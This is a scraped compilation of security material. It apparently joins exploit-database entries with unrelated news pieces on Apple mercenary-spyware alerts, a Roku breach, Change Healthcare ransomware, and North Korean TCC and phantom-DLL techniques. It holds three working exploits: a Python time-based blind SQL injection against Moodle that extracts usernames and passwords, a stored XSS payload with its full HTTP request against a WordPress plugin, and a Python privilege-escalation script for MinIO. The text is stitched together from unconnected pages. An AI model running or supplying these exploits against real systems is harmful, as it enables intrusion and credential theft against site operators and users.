Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

Cybersecurity researchers have discovered a "renewed" cyber espionage campaign targeting users in South Asia with the aim of delivering an Apple iOS spyware implant called LightSpy.
"The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular framework with extensive spying features," the BlackBerry Threat Research and Intelligence Team said in a report published last

Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users

A list of topics we covered in the week of April 8 to April 14 of 2024

April 12, 2024 - Wondering whether changing your SSN is an option. Read here what you need to qualify for a new SSN and what you need to get one.

April 11, 2024 - Apple has sent alerts to people in 92 nations to say it's detected that they may have been a victim of a mercenary attack.

April 10, 2024 - Don't wait for an online harassment campaign to unfairly target you or a loved one. Take these proactive steps today to stay safe.

April 10, 2024 - Find out what sensitive data of yours is exposed online today with our new, free Digital Footprint Portal.

April 9, 2024 - A man has pleaded guilty to assuming someone else's identity for 35 years.

 A week in security (April 8 &#8211; April 14) 

Plus: Apple warns iPhone users about spyware attacks, CISA issues an emergency directive about a Microsoft breach, and a ransomware hacker tangles with an unimpressed HR manager named Beth.

After months of delays, the US House of Representatives voted on Friday to extend a controversial warrantless wiretap program for two years. Known as Section 702, the program authorizes the US government to collect the communications of foreigners overseas. But this collection also includes reams of communications from US citizens, which are stored for years and can later be warrantlessly accessed by the FBI, which has heavily abused the program. An amendment that would require investigators to obtain such a warrant failed to pass.

A group of US lawmakers on Sunday unveiled a proposal that they hope will become the country’s first nationwide privacy law. The American Privacy Rights Act would limit the data that companies can collect and give US residents greater control over the personal information that is collected about them. Passage of such legislation remains far off, however: Congress has attempted to pass a national privacy law for years and has thus far failed to do so.

Absent a US privacy law, you’ll need to take matters into your own hands. DuckDuckGo, the privacy-focused company famous for its search engine, now offers a new product called Privacy Pro that includes a VPN, a tool for having your data removed from people-search websites, and a service for restoring your identity if you fall victim to identity theft. There are also steps you can take to wrench back some of the data used to train generative AI systems. Not all systems out there offer the option to opt out of data collection, but we have a rundown of the ones that do and how to keep your data out of AI models.

Data collection isn’t the only risk associated with AI advancements. AI-generated scam calls are becoming more sophisticated, with cloned voices sounding eerily like the real thing. But there are precautions you can take to protect yourself from getting swindled by someone using AI to sound like a loved one.

Change Healthcare’s ongoing ransomware nightmare appears to have gotten worse. The company was originally targeted by a ransomware gang known as AlphV in February. But after the hackers received a $22 million payment early last month, a rift appeared to grow between AlphV and affiliate hackers, who say AlphV took the money and ran without paying other groups that helped them carry out the attack. Now, another ransomware group, RansomHub, claims it has terabytes of Change Healthcare’s data and is attempting to extort the company. Service disruptions caused by the ransomware attack have impacted healthcare providers and their patients across the US.

That’s not all. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The streaming video service Roku warned customers Friday that 576,000 accounts had been compromised, a breach it discovered in the midst of its investigation of a far smaller-scale intrusion that it dealt with in March. Roku said that rather than actually penetrating Roku’s own network through a security vulnerability, the hackers had carried out a “credential-stuffing” attack in which they tried passwords for users that had leaked elsewhere, thus breaking into accounts where users had reused those passwords. The company noted that in less than 400 cases, hackers had actually exploited their access to make purchases with the hijacked accounts. But the company nonetheless reset users’ passwords and is implementing two-factor authentication on all user accounts.

**Apple Notifies Users of Mercenary Spyware Infections**

Apple sent notices via email to users in 92 countries around the world this week, warning them that they had been targeted by sophisticated “mercenary spyware” and that their devices may be compromised. The notice stressed that the company had “high confidence” in this warning and urged potential hacking victims to take it seriously. In a status page update, it suggested that anyone who receives the warning contact the Digital Security Helpline of the nonprofit Access Now and enable Lockdown Mode for future protection. Apple didn’t offer any information publicly about who the hacking victims are, where they’re located, or who the hackers behind the attacks might be, though in its blog post, it compared the malware to the sophisticated Pegasus spyware sold by the Israeli hacking firm NSO Group. It wrote in its public support post that it’s warned users in a total of 150 countries about similar attacks since 2021.

**CISA Warns Federal Agencies to Look Out for Russian Hackers Stealing Emails**

April continues to be the cruelest month for Microsoft—or perhaps Microsoft’s customers. On the heels of a Cybersecurity Review Board report on Microsoft’s previous breach by Chinese state-sponsored hackers, the Cybersecurity and Infrastructure Security Agency (CISA) published a report this week warning federal agencies that their communications with Microsoft may have been compromised by a group known as APT29, Midnight Blizzard, or Cozy Bear, believed to work on behalf of Russia’s SVR foreign intelligence agency. “Midnight Blizzard’s successful compromise of Microsoft corporate email accounts and the exfiltration of correspondence between agencies and Microsoft presents a grave and unacceptable risk to agencies,” CISA said in the emergency directive. As recently as March, Microsoft said that it was still working to expel the hackers from its network.

**When a Ransomware Hacker Calls a Victim Company’s Front Desk**

As ransomware hackers seek new ways to bully their victims into giving in to their extortion demands, one group tried the novel approach of calling the front desk of the company it had targeted to verbally threaten its staff. Thanks to one HR manager named Beth, that tactic ended up sounding about as threatening as a clip from an episode of _The Office_.

TechCrunch describes a recording of the conversation, which a ransomware group calling itself Dragonforce posted to its dark-web site in a misguided attempt to pressure the victim company to pay. (TechCrunch didn’t identify the victim.) The call starts like any tedious attempt to find the right person after calling a company’s publicly listed phone number, as the hacker waits to speak to someone in “management.”

Eventually, Beth picks up and a somewhat farcical conversation ensues as she asks that the hacker explain the situation. When he threatens to make the company’s stolen data available for “fraudulent activities and for terrorism by criminals,” Beth responds “Oh, ok,” in an altogether unimpressed tone. She then asks if the data will be posted to “Dragonforce.com.” At another point, she notes to the increasingly frustrated hacker that recording their call is illegal in Ohio, and he responds, “Ma’am, I am a hacker. I don’t care about the law.” Finally, Beth refuses to negotiate with the hacker with a “Well, good luck,” to which the hacker responds, “Thank you, take care.”

Roku Breach Hits 567,000 Users

By Deeba Ahmed
Apple has issued iPhone security alerts to 92 countries, stating that their devices have been targeted by a mercenary spyware attack, expressing high confidence in the warning.
This is a post from HackRead.com Read the original post: iPhone Users in 92 Countries Targeted by Mercenary Spyware Attacks

Apple has issued security alerts to millions of iPhone users across 92 countries, stating that their devices are being targeted by mercenary spyware. The alerts suggest that the attack is likely targeting users based on their identity or activities.

Apple has been informing users of threats for years, targeting journalists and politicians in over 150 countries since 2021. Some users have found invasive Pegasus spyware on their iPhones, created by Israeli spyware maker NSO Group. However, the company hasn’t provided any official numbers in the current case.

Apple’s threat notification (Read Apple’s updated statement here)

****Apple Requests Users to Take It Seriously!****

As reported by The Economic Times, Apple has stated in the warning email that the attack is likely targeted due to specific characteristics or actions, urging users to take it seriously.

A targeted mercenary spyware attack could remotely access sensitive data, communications, or even the camera and microphone, according to Apple’s threat notification email.

Despite the Indian government’s opposition to security alerts by Apple, India is among the countries affected by this issue, and it’s unclear if US iPhone owners were targeted, as Apple hasn’t provided any further details.

Apple has sent multiple alerts to over 150 countries since 2021 and it previously sued Israeli firm NSO Group for aiding adversaries in targeting iPhone users. Moreover, Apple has been releasing iOS updates to address potential spyware attacks, often as emergency security measures, especially when an iPhone flaw is already being exploited.

If you have received this notification, remember that Apple has dedicated a page to offer guidance on changing passwords and enabling two-factor authentication to enhance security.

****What are Mercenary Attacks?****

Mercenary attacks are targeted spyware attacks, which are a unique type of cyberattacks that targets specific individuals based on their profession, social status, or access to sensitive information. They use sophisticated spyware, like Pegasus, to infiltrate devices and gather vast amounts of data.

These attacks, are expensive and require extensive resources to execute. Mercenary attacks are rare and complex cybercrimes, costing millions and targeting a small number of people worldwide, according to a company email.

Brian Higgins, security specialist at Comparitech commented on the issue. _“_There have been enough periodic Pegasus activations in recent years for those who are regularly targeted to hopefully have some kind of response or mitigation plans in place,_“_ he said.

_“_Most often journalists and activists in jurisdictions of risk are targeted as they are vulnerable to intervention, prosecution and attack by the regimes they challenge – and data harvested in these breaches can facilitate all of these activities,_“_ Brain warned.

_“_It’s rather a disappointing buck-passing exercise for Apple to direct them to a third party, non-profit Security Helpline, given the history of implications for individual targets in previous incidents. You’d think as proprietors of a vulnerable platform, they would offer to help out themselves._“_

1.  Apple Issues Urgent Security Patches for Zero-Day Flaws
2.  iLeakage Attack: Theft of Data from Apple’s Safari Browser
3.  QuaDream, Israeli iPhone hacking spyware firm, to shut down
4.  Fake Lockdown Mode Exposes iOS Users to Malware Attacks
5.  iPhone Spyware Exploits Obscure Chip Feature, Hits Researchers

iPhone Users in 92 Countries Targeted by Mercenary Spyware Attacks

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

WordPress Playlist For Youtube 1.32 Cross Site Scripting

MinIO versions prior to 2024-01-31T20-20-33Z suffer from a privilege escalation vulnerability.

    # Exploit Title: MinIO < 2024-01-31T20-20-33Z -  Privilege Escalation# Date: 2024-04-11# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z# Tested on: Windows 10# CVE : CVE-2024-24747# Required before execution: pip install minio,requestsimport argparseimport datetimeimport tracebackimport urllibfrom xml.dom.minidom import parseStringimport requestsimport jsonimport base64from minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class CVE_2024_24747:    new_buckets = []    old_buckets = []    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):        self.bucket_names = ['pocpublic', 'pocprivate']        self.new_accesskey = 'miniocvepoc'        self.new_secretkey = 'MINIOcvePOC'        self.headers = {          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',          'Content-Type': 'application/json',          'Accept': '*/*'        }        self.accesskey = accesskey        self.secretkey = secretkey        self.verify = verify        if verify:            self.url = "https://" + host + ":" + port            self.console_url = "https://" + host + ":" + console_port        else:            self.url = "http://" + host + ":" + port            self.console_url = "http://" + host + ":" + console_port        self.credits = Credentials(            access_key=self.new_accesskey,            secret_key=self.new_secretkey        )        self.login()        try:            self.create_buckets()            self.create_accesskey()            self.old_buckets = self.console_ls()            self.console_exp()            self.new_buckets = self.console_ls()        except:            traceback.print_stack()        finally:            self.delete_accesskey()            self.delete_buckets()            if len(self.new_buckets) > len(self.old_buckets):                print("There is CVE-2024-24747 problem with the minio!")                print("Before the exploit, the buckets are : " + str(self.old_buckets))                print("After the exploit, the buckets are : " + str(self.new_buckets))            else:                print("There is no CVE-2024-24747 problem with the minio!")    def login(self):        url = self.url + "/api/v1/login"        payload = json.dumps({          "accessKey": self.accesskey,          "secretKey": self.secretkey        })        self.session = requests.session()        if self.verify:            self.session.verify = False        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 204:            status_code = 0        else:            print('Login failed! Please check if the input accesskey and secretkey are correct!')            exit(1)    def create_buckets(self):        url = self.url + "/api/v1/buckets"        for name in self.bucket_names:            payload = json.dumps({                "name": name,                "versioning": False,                "locking": False            })            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code            # print(status_code)            if status_code == 200:                status_code = 0            else:                print("新建 (New)"+name+" bucket 失败 (fail)！")    def delete_buckets(self):        for name in self.bucket_names:            url = self.url + "/api/v1/buckets/" + name            status_code = self.session.request("DELETE", url, headers=self.headers).status_code            # print(status_code)            if status_code == 204:                status_code = 0            else:                print("删除 (delete)"+name+" bucket 失败 (fail)！")    def create_accesskey(self):        url = self.url + "/api/v1/service-account-credentials"        payload = json.dumps({            "policy": "{              \n    \"Version\":\"2012-10-17\",              \n    \"Statement\":[              \n        {              \n            \"Effect\":\"Allow\",              \n            \"Action\":[              \n                \"s3:*\"              \n            ],              \n            \"Resource\":[              \n                \"arn:aws:s3:::pocpublic\",              \n                \"arn:aws:s3:::pocpublic/*\"              \n            ]              \n        }              \n    ]              \n}",            "accessKey": self.new_accesskey,            "secretKey": self.new_secretkey        })        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 201:            # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！")            # print(self.new_secretkey)            status_code = 0        else:            print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！")    def delete_accesskey(self):        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')        status_code = self.session.request("DELETE", url, headers=self.headers).status_code        # print(status_code)        if status_code == 204:            # print("删除" + self.new_accesskey + " accessKey成功！")            status_code = 0        else:            print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！")    def headers_gen(self,url,sha256,method):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(url)        headers = {            'X-Amz-Content-Sha256': sha256,            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method=method,            url=urls,            region='us-east-1',            headers=headers,            credentials=self.credits,            content_sha256=sha256,            date=datetimes,        )        return headers    def console_ls(self):        url = self.console_url + "/"        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"        headers = self.headers_gen(url,sha256,'GET')        if self.verify:            response = requests.get(url,headers=headers,verify=False)        else:            response = requests.get(url, headers=headers)        DOMTree = parseString(response.text)        collection = DOMTree.documentElement        buckets = collection.getElementsByTagName("Bucket")        bucket_names = []        for bucket in buckets:            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)        # print('当前可查看的bucket有:\n' + str(bucket_names))        return bucket_names    def console_exp(self):        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"        headers = self.headers_gen(url, sha256, 'POST')        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"        content = bytes.fromhex(hex_string)        if self.verify:            response = requests.post(url,headers=headers,data=content,verify=False)        else:            response = requests.post(url,headers=headers,data=content)        status_code = response.status_code        if status_code == 204:            # print("提升" + self.new_accesskey + " 权限成功！")            status_code = 0        else:            print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！")if __name__ == '__main__':    logo = """                            ____    ___   ____   _  _           ____   _  _    _____  _  _    _____   ___ __   __  ___        |___ \  / _ \ |___ \ | || |         |___ \ | || |  |___  || || |  |___  | / __|\ \ / / / _ \ _____   __) || | | |  __) || || |_  _____   __) || || |_    / / | || |_    / / | (__  \ V / |  __/|_____| / __/ | |_| | / __/ |__   _||_____| / __/ |__   _|  / /  |__   _|  / /   \___|  \_/   \___|       |_____| \___/ |_____|   |_|         |_____|   |_|   /_/      |_|   /_/                               """    print(logo)    parser = argparse.ArgumentParser()    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")    args = parser.parse_args()    CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

MinIO Privilege Escalation

North Korean hackers break ground with new exploitation techniques for Windows and macOS.

Source: Stuart Miles via Alamy Stock Photo

This month, MITRE will be adding two sub-techniques to its ATT&CK database that have been widely exploited by North Korean threat actors.

The first, not entirely new, sub-technique involves manipulation of Transparency, Consent, and Control (TCC), a security protocol that regulates application permissions on Apple's macOS.

The other — called "phantom" dynamic link library (DLL) hijacking — is a lesser-known subset of DLL hijacking, where hackers take advantage of referenced but nonexistent DLL files in Windows.

Both TCC manipulation and phantom DLL hijacking have allowed North Korean hackers to gain privileged access into macOS and Windows environments, respectively, from which they could perform espionage and other post-exploitation actions.

**TCC Manipulation**

"North Korea is opportunistic," says Marina Liang, threat intelligence engineer at Interpres Security. "They have a dual purpose of espionage and also revenue generation, so they're going to look to be where their targets are. And because macOS is increasing in popularity, that's where they started to pivot."

One way North Korean advanced persistent threats (APTs) have been breaching Macs lately is via TCC, an essential framework for controlling application permissions.

TCC has a user- and system-level database. The former is protected with permissions — a user would require Full Disk Access (FDA), or something similar — and the latter by System Integrity Protection (SIP), a feature first introduced with macOS Sierra. Theoretically, privileges and SIP are guards against malicious TCC access.

In practice, however, there are scenarios where each can be undermined. Administrators and security apps, for example, might require FDA to properly function. And there are times when users circumvent SIP.

"When developers need flexibility on their machine, or they're being blocked by the operating system, they might decrease those controls that Apple has in place to allow them to code and create software," Liang explains. "Anecdotally, I've seen that developers troubleshooting will try to figure out what's in place \[on the system\], and disable it to see if that solves their issue."

When SIP is switched off, or FDA on, attackers have a window to access the TCC database and grant themselves permissions without alerting the user.

There are a number of other ways to potentially get through TCC, too. For example, some sensitive directories such as /tmp fall outside of TCC's domain entirely. The Finder app has FDA enabled by default, and it's not listed in the user's Security & Privacy window, meaning that a user would have to be independently aware and manually revoke its permissions. Attackers can also use social engineering to direct users in disabling security controls.

A number of malware tools have been designed to manipulate TCC, including Bundlore, BlueBlood, Callisto, JokerSpy, XCSSET, and other unnamed macOS Trojans recorded on VirusTotal. Liang identified Lazarus Group malware, which attempts to dump the access table from the TCC database, and CloudMensis by APT37 (aka InkSquid, RedEyes, BadRAT, Reaper, or ScarCruft) doggedly tries to identify where SIP is disabled in order to load its own malicious database.

Dark Reading contacted Apple for a statement regarding TCC abuses and received no reply.

To block attackers taking advantage of TCC, the most important thing is keeping SIP enabled. Short of that, Liang highlights the need to know which apps have what permissions in your system. "It's being aware of what you're granting permissions to. And then — obviously it's easier said than done — exercising \[the principle of\] least privileged \[access\]. If certain apps don't necessarily need certain permissions to function, then remove them," she says.

Besides TCC vulnerabilities, APAC-area threat actors have been exploiting an even stranger flaw in Windows. For some reason, the operating system references a number of DLL files that don't actually exist.

"There are a ton of them," Liang marvels. "Maybe someone was working on a project to create specific DLLs for specific purposes, and maybe it got shelved, or they didn't have enough resources, or just forgot about it."

Dark Reading has reached out to Microsoft for clarification on this point.

To a hacker, a so-called "phantom" DLL file is like a blank canvas. They can simply create their own malicious DLLs with the same name, and write them to the same location, and they'll be loaded by the operating system with nobody the wiser.

The Lazarus Group and APT 41 (aka Winnti, Barium, Double Dragon) have used this tactic with IKEEXT, a service necessary for authentication and key exchange within Internet protocol security. When IKEEXT triggers, it attempts to load the nonexistent "wlbsctrl.dll." APT41 has also targeted other phantom DLLs like "wbemcomn.dll," loaded by the Windows Management Instrumentation (WMI) provider host.

Until Windows rids itself of phantom DLLs, Liang highly recommends companies run monitoring solutions, deploy proactive application controls, and automatically block remote loading of DLLs, a feature included by default in Windows Server.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

DPRK Exploits 2 MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse

Apple has sent alerts to people in 92 nations to say it's detected that they may have been a victim of a mercenary attack.

Apple has reportedly sent alerts to individuals in 92 nations on Wednesday, April 10, to say it’s detected that they may have been a victim of a mercenary attack. The company says it has sent out these types of threat notifications to over 150 countries since the start in 2021.

Mercenary spyware is used by governments to target people like journalists, political activists, and similar targets, and involves the use of sophisticated tools like Pegasus. Pegasus is one of the world’s most advanced and invasive spyware tools, known to utilize zero-day vulnerabilities against mobile devices.

The second number became known when Apple changed the wording of the relevant support page. The change also included the title that went from “About Apple threat notifications and protecting against **state-sponsored attacks**” to “About Apple threat notifications and protecting against **mercenary spyware**.”

If you look at the before and after, you’ll also notice an extra paragraph, again with the emphasis on the change from “state-sponsored attacks” to “mercenary spyware.”

The cause for the difference in wording might be because “state-sponsored” is often used to indicate attacks targeted at entities, like governments or companies, while these mercenary attacks tend to be directed at individual people.

The extra paragraph specifically calls out the NSO Group and the Pegasus spyware it sells. While the NSO Group claims to only sell to “government clients,” we have no reason to take its word for it.

Apple says that when it detects activity consistent with a mercenary spyware attack it uses two different means of notifying the users about the attack:

*   Displays a Threat Notification at the top of the page after the user signs into appleid.apple.com.
*   Sends an email and iMessage notification to the email addresses and phone numbers associated with the user’s Apple ID.

Apple says it doesn’t want to share information about what triggers these notifications, since that might help mercenary spyware attackers adapt their behavior to evade detection in the future.

The NSO Group itself argued in a court case started by Meta for spying on WhatsApp users, that it should be recognized as a foreign government agent and, therefore, be entitled to immunity under US law limiting lawsuits against foreign countries.

NSO Group has also said that its tool is increasingly necessary in an era when end-to-end encryption is widely available to criminals.

**How to stay safe**

Apple advises iPhone users to:

*   Enable Lockdown mode.
*   Keep devices up to date.
*   Protect devices with a passcode.
*   Use Multi-Factor-Authentication (MFA) for your Apple ID.
*   Only install apps from the App Store.
*   Use strong and unique passwords online.
*   Don’t click on links or attachments from unknown senders.

We’d like to add:

*   Use an anti-malware solution on your device.
*   If you’re not sure about something that’s been sent to you, verify it with the person or company via another communcation channel.
*   Use a password manager.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Apple warns people of mercenary attacks via threat notification system 

In new threat notification information, Apple singled out Pegasus vendor NSO Group as a culprit in mercenary spyware attacks.

Source: nk Drop via Shutterstock

Apple this week updated its spyware threat notification system to alert and assist users it identifies as targeted by mercenary spyware attacks.

To date, Apple has spotted and alerted users in more than 150 countries that they were targeted in these attacks.

Such spyware attacks target individuals largely because of who they are and what they do, Apple said. While most people will never be targeted by these types of attacks, a small number of people — journalists, activists, politicians, and the like — will potentially be victimized. 

Apple said once it detects spyware it notifies the user within two days. The vendor does provide threat actor attribution, however.

In its notice, Apple pointed fingers at the NSO Group, one of the private companies that develops the mercenary spyware Pegasus that is used in such attacks. "According to public reporting and research by civil society organizations, technology firms, and journalists, individually targeted attacks of such exceptional cost and complexity have historically been associated with state actors, including private companies," stated the notice on Apple's support page. 

Should an individual receive a threat notification, Apple recommends that they seek the help of either Apple or a third party. Apple's notifications never ask the user to click on any link or install an application; the threat notification can be verified simply by signing into applied.apple.com, where the notification will be at the top of the page. 

**About the Author(s)**

Tag

#apple